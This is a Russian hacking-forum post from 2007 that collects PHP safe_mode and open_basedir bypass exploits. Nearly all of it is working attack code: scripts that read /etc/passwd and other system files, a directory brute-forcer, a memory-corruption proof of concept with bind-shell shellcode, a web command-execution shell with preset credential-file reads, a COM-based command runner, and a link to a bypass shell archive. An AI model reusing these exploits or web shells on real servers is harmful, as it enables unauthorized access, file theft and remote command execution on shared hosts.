Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
04.08.2007, 15:07
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
safe_mode
Способы позволяющие снять "ограничения" safe_mode:
PHP код:
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("compres.zlib://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>
PHP код:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
PHP код:
<?
// Safe mode breaker. eXpl0id by KPbIC [myiworm@mail.ru]
// data: 28.01.2006
error_reporting(E_WARNING);
ini_set("display_errors", 1);
echo "<head><title>".getcwd()."</title></head>";
echo "<form method=POST>";
echo "<div style='float: left'>Root directory: <input type=text name=root value='{$_POST['root']}'></div>";
echo "<input type=submit value='--»'></form>";
echo "<HR>";
// break fucking safe-mode !
$root = "/";
if($_POST['root']) $root = $_POST['root'];
if (!ini_get('safe_mode')) die("Safe-mode is OFF.");
$c = 0; $D = array();
set_error_handler("eh");
$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
for($i=0; $i < strlen($chars); $i++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
$prevD = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD){
for($j=0; $j < strlen($chars); $j++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
$prevD2 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD2){
for($p=0; $p < strlen($chars); $p++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
$prevD3 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD3){
for($r=0; $r < strlen($chars); $r++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
glob($path."*");
}
}
}
}
}
}
}
$D = array_unique($D);
echo "<xmp>";
foreach($D as $item) echo "{$item}\n";
echo "</xmp>";
function eh($errno, $errstr, $errfile, $errline){
global $D, $c, $i;
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
if($o){ $D[$c] = $o[2]; $c++;}
}
?>
PHP код:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
echo file_get_contents("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
echo file_get_contents("/etc/passwd");
?>
PHP код:
<?php
/*
POC developed by Heintz.
Greets to Waraxe from www.waraxe.us
All buds from www.plain-text.info
Torufoorum
Thanks to metasploit.com for shellcode loan.
*/
// tested addresses from php5ts.dll (php 5.1.4) running win x64 pro
// $ptr_to_ptr_to_zval = "\x10\x43\x54\xCC";
// $ptr_to_zval = "\x10\x43\x54\xB0";
// $ptr_to_obj_handlers = "\x10\x43\x54\xAC"; // $ptr_to_zval-4
// addresses from php 5.1.4 cli, compiled with gcc version 3.3.6,
// kernel 2.6.14-hardened-r3
$ptr_to_ptr_to_zval = "\x08\x1A\x64\xC8";
$ptr_to_zval = "\x08\x1A\x60\x0C";
$ptr_to_obj_handlers = "\x08\x1A\x60\x08"; // $ptr_to_zval-4
// nop, nop, nop, mov eax,nex-4-bytes. to disarm 4 next bytes
$eip_hop_over = "\x90\x90\x90\xB8";
# linux_ia32_bind - LPORT=5555 Size=108 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef".
"\x57\xe6\x92\x83\xeb\xfc\xe2\xf4\xde\x8c\xb5\xd1\xbc\x3d\xe4\xf8".
"\x89\x0f\x7f\x1b\x0e\x9a\x66\x04\xac\x05\x80\xfa\xfa\xe4\x80\xc1".
"\x66\xb6\x8c\xf4\xb7\x07\xb7\xc4\x66\xb6\x2b\x12\x5f\x31\x37\x71".
"\x22\xd7\xb4\xc0\xb9\x14\x6f\x73\x5f\x31\x2b\x12\x7c\x3d\xe4\xcb".
"\x5f\x68\x2b\x12\xa6\x2e\x1f\x22\xe4\x05\x8e\xbd\xc0\x24\x8e\xfa".
"\xc0\x35\x8f\xfc\x66\xb4\xb4\xc1\x66\xb6\x2b\x12";
if(bin2hex(pack('S',0x0010))!="0010")
{ // small endian conversion
$t = $ptr_to_ptr_to_zval;
$ptr_to_ptr_to_zval = $t{3}.$t{2}.$t{1}.$t{0};
$t = $ptr_to_zval;
$ptr_to_zval = $t{3}.$t{2}.$t{1}.$t{0};
$t = $ptr_to_obj_handlers;
$ptr_to_obj_handlers = $t{3}.$t{2}.$t{1}.$t{0};
}
$object_zval = $eip_hop_over.$ptr_to_obj_handlers.$eip_hop_over.
"\x05\x01\x90\x90".$shellcode."\xC3\x90\x90\x20";
$str = str_repeat($ptr_to_ptr_to_zval,20);
unset($str);
sscanf(
$object_zval,
'%1$s',
$str);
putenv("PHP_foo=".str_repeat($ptr_to_zval,64));
putenv("PHP_foo=");
sscanf(
"a ",
'%1$s',
$str);
?>
PHP код:
<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>
<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "</pre>";
imap_close($stream);
}
?>
PHP код:
<?php
if (isset($_REQUEST['file'])) {
$file = "sendlog";
if (file_exists($file)) unlink($file);
$extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
mb_send_mail(NULL, NULL, NULL, NULL, $extra);
echo "<pre>".file_get_contents($file)."</pre>";
}
?>
PHP код:
<?php
$file=""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>
PHP код:
<?
/*
Kodlama By Liz0ziM
www.expw0rm.com
Safe Mode Command Execution Shell
http://securityreason.com/achievement_securityalert/42
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonu?lar?:</font></b><br>";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
PHP код:
<?php
// inconsistent PHP safe_mode on Win32
$____suntzu = new COM("WScript.Shell");
$____suntzu->Run('c:\windows\system32\cmd.exe /c dir *.* > '.dirname($_SERVER[SCRIPT_FILENAME]).'/suntzoi.txt');
$____suntzoi=file("suntzoi.txt");
for ($i=0; $i<count($____suntzoi); $i++) {echo nl2br(htmlentities($____suntzoi[$i]));}
// *quote* from the php manual:
// There is no installation needed to use these functions; they are part of the PHP core.
// The windows version of PHP has built in support for this extension. You do not need to load any additional extension in order to use these functions.
// You are responsible for installing support for the various COM objects that you intend to use (such as MS Word);
// we don't and can't bundle all of those with PHP.
?>
Safe Mode Bypass Shell -44kb
Методы: SQL ,id ,CURL ,copy ,ini_restore ,imap.
_http://someshit.net/files/SMBS.rar
Последний раз редактировалось ettee; 23.08.2007 в 19:15..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид